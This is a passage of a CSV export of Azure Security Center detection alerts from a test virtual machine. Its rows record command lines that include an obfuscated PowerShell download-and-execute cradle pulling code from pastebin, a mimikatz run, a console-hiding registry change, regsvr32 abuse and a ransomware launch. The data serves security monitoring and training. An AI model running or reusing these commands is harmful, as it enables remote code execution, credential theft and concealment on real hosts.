]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
141,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,5cb7ab95-6017-4031-afb2-e11518b0f5cc,2518547480980813134_5cb7ab95-6017-4031-afb2-e11518b0f5cc,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x134c"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x134c"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
142,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,2a106d12-acd8-4dd7-9e1c-3c20b4eaa320,2518547480976076338_2a106d12-acd8-4dd7-9e1c-3c20b4eaa320,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\systmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.'",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1664"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1664"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
143,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,e9ff6947-fd12-42d2-bb63-2d814f04482a,2518547480977469312_e9ff6947-fd12-42d2-bb63-2d814f04482a,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1430"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1430"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
144,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,ed9d92ac-0ab8-4a2e-a1dd-f70ee30a9af1,2518547480977057409_ed9d92ac-0ab8-4a2e-a1dd-f70ee30a9af1,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15e8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
145,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,7e663699-5412-496f-ac91-e21a7b6f0be5,2518547480975043692_7e663699-5412-496f-ac91-e21a7b6f0be5,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x73c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x73c"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
146,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,f83c0705-d2ff-4355-a25d-ae858ee39b2d,2518547480946682289_f83c0705-d2ff-4355-a25d-ae858ee39b2d,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x138c"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiCwFh64yyJn1k1fvbXfd7nZFxe9c4Y852b0VekrMJw%3D&spr=https&st=2019-01-14T14:11:54Z&se=2019-04-14T14:26:54Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=dbb5dbe9-5ab7-455f-96cf-d88ac58c1c00\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x138c"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
147,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:06,2019-01-15 11:45:06,ec1678a1-0fe8-44c5-91b5-621c40d2bb8c,2518547480937987105_ec1678a1-0fe8-44c5-91b5-621c40d2bb8c,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the hsot and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\systmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xb10"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=tL87fydg2X3ANo7oW3HGLc%2BTDgcnvawDxPkkDILtH7Q%3D&spr=https&st=2019-01-14T17:39:21Z&se=2019-04-14T17:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xb10"",
""CommandLine"": ""c:\\diagnostics\\systmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""EndTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
148,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,5c82cd9c-60f8-4056-bd39-8ccb2cdb7678,2518547480947565906_5c82cd9c-60f8-4056-bd39-8ccb2cdb7678,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1008"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LueDumic0L5UTuSQN3FPjliH4QkhDGHUL9y3YsjBTpM%3D&spr=https&st=2019-01-14T14:59:40Z&se=2019-04-14T15:14:40Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1008"",
""CommandLine"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
149,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,00d33245-c643-4155-8c05-6abc4ee3b3cd,2518547480945920380_00d33245-c643-4155-8c05-6abc4ee3b3cd,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\asc_alerttest_662jfi039n.exe"",
